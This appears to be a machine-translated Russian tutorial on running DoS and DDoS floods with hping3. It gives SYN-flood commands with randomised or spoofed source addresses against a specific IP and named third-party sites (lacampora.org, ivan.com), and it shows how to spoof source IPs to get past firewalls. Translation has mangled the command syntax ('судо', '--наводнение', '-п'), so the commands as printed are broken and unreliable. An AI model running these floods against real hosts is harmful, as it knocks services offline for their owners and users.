Hping3 флуд ddos

Hping3 Flood Ddos



В этом руководстве основное внимание уделяется атакам DDOS (распределенный отказ в обслуживании) с использованием инструмента hping3. Если вы уже знакомы с DOS (отказ в обслуживании) и DDOS-атаками, вы можете продолжить чтение из практических инструкций hping3, в противном случае рекомендуется узнать, как эти атаки работают.

DOS атаки


Атака отказа в обслуживании (DOS) - это очень простой метод отказа в доступе к службам (поэтому он называется атакой отказа в обслуживании). Эта атака заключается в перегрузке цели пакетами слишком большого размера или большим их количеством.







Хотя эту атаку очень легко выполнить, она не ставит под угрозу информацию или конфиденциальность цели, она не является проникающей атакой и направлена ​​только на предотвращение доступа к цели.
Отправляя определенное количество пакетов, цель не может обработать злоумышленников, чтобы сервер не обслуживал законных пользователей.



Атаки DOS выполняются с одного устройства, поэтому их легко остановить, заблокировав IP-адрес злоумышленника, но злоумышленник может изменить и даже подделать (клонировать) целевой IP-адрес, но межсетевым экранам несложно справиться с такими атаками. , в отличие от того, что происходит с DDOS-атаками.



DDOS-атаки

Распределенная атака отказа в обслуживании (DDOS) похожа на атаку DOS, но выполняется одновременно с разных узлов (или разных злоумышленников). Обычно DDOS-атаки осуществляются ботнетами. Ботнеты - это автоматизированные скрипты или программы, которые заражают компьютеры для выполнения автоматизированной задачи (в данном случае DDOS-атаки). Хакер может создать ботнет и заразить множество компьютеров, с которых ботнеты будут запускать DOS-атаки. Тот факт, что многие ботнеты стреляют одновременно, превращает DOS-атаку в DDOS-атаку (поэтому она называется распределенной).





Конечно, есть исключения, в которых DDOS-атаки были осуществлены реальными злоумышленниками, например группа хакеров Anonymous, объединенная тысячами людей по всему миру, очень часто использовала этот метод из-за его простой реализации (для этого требовались только добровольцы, которые разделяли их идею), Вот, например, как Anonymous полностью отключили ливийское правительство Каддафи во время вторжения, ливийское государство оказалось беззащитным перед тысячами нападавших со всего мира.

Этот тип атак, когда они осуществляются с множества разных узлов, чрезвычайно сложно предотвратить и остановить, и обычно для борьбы с ними требуется специальное оборудование, поскольку брандмауэры и защитные приложения не готовы бороться с тысячами злоумышленников одновременно. Это не относится к hping3, большинство атак, выполняемых с помощью этого инструмента, будут заблокированы защитными устройствами или программным обеспечением, но он полезен в локальных сетях или против плохо защищенных целей.



О hping3

Инструмент hping3 позволяет отправлять управляемые пакеты. Этот инструмент позволяет вам контролировать размер, количество и фрагментацию пакетов, чтобы перегрузить цель и обойти или атаковать межсетевые экраны. Hping3 может быть полезен для целей тестирования безопасности или возможностей, с его помощью вы можете проверить эффективность брандмауэров и может ли сервер обрабатывать большое количество пакетов. Ниже вы найдете инструкции по использованию hping3 для тестирования безопасности.

Начало работы с DDOS-атаками с использованием hping3:

В Debian и дистрибутивах Linux вы можете установить hping3, выполнив:

#подходящийустановитьhping3-а также

Простая атака DOS (не DDOS) будет выглядеть так:

#судоhping3-S --наводнение -V -п 80170.155.9.185

Где:
sudo: дает необходимые привилегии для запуска hping3.
hping3:
вызывает программу hping3.
-S: определяет пакеты SYN.
-наводнение: снимайте по своему усмотрению, ответы будут игнорироваться (поэтому ответы не будут отображаться), а пакеты будут отправляться как можно быстрее.
-V: Многословие.
-p 80: порт 80, вы можете заменить этот номер на службу, которую хотите атаковать.
170.155.9.185: целевой IP.

Флуд с использованием SYN-пакетов на порт 80:

В следующем примере изображена SYN-атака на lacampora.org:

#судоhping3 lacampora.org-q -n -d 120 -S -п 80 --наводнение --rand-источник

Где:
Lacampora.org: цель
-q: краткий вывод
-n: показать целевой IP вместо хоста.
-d 120: установить размер пакета
–Rand-источник: скрыть IP-адрес.

В следующем примере показан другой пример возможного наводнения:

SYN-флуд на порт 80:

#судоhping3--rand-источникivan.com-S -q -п 80 --наводнение

С помощью hping3 вы также можете атаковать свои цели с помощью поддельного IP-адреса, чтобы обойти брандмауэр, вы даже можете клонировать сам целевой IP-адрес или любой разрешенный адрес, который вы можете знать (вы можете достичь этого, например, с помощью Nmap или сниффера для прослушивания установленного соединения).

Синтаксис будет таким:

#судоhping3 <ПОДДЕЛЬНЫЙ IP> <цель> -S -q -п 80 --Быстрее -c2

В этом практическом примере атака может выглядеть:

#судоhping3190.0.175.100 190.0.175.100-S -q -п 80 --Быстрее -c2

Надеюсь, вы нашли этот урок по hping3 полезным. Следите за LinuxHint, чтобы получать больше советов и обновлений по Linux и сети.